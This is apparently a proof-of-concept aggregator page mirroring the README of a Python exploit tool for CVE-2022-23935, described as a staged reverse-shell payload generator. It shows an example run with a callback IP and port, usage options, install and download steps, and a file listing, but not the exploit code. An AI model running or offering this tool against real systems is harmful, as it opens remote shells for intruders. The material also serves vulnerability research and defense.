关联漏洞
Description
🐍 Python Exploit for CVE-2022-23935
介绍
# CVE-2022-23935
🐍 Python Exploit for CVE-2022-23935
Staged Reverse Shell Payload Generator for CVE-2022-23935
## Example
```
cve-2022-23935 10.10.16.3 44444
```
## Usage
```bash
usage: cve-2022-23935 [-h] [-l SERVER_PORT] [-s SHELL] ip port
positional arguments:
ip IP Address/Host for Callback
port Port Number for Callback
options:
-h, --help show this help message and exit
-l SERVER_PORT, --listen SERVER_PORT
Port Number for Server Listen
-s SHELL, --shell SHELL
Remote Shell
```
## Installation
```bash
python3 -m pip install cve-2022-23935-1.0.0-py3-none-any.whl
```
[Download Latest Release](https://github.com/BKreisel/CVE-2022-23935/releases/download/1.0.0/cve_2022_23935-1.0.0-py3-none-any.whl)
## Demo
[](https://asciinema.org/a/558936?autoplay=1)
文件快照
[4.0K] /data/pocs/835a37a3042c36710844a0b91a0739c96aefc9dc
├── [1.0K] LICENSE
├── [ 737] pyproject.toml
├── [ 919] README.md
└── [4.0K] src
└── [4.0K] cve_2022_23935
├── [ 0] __init__.py
└── [5.8K] main.py
2 directories, 5 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。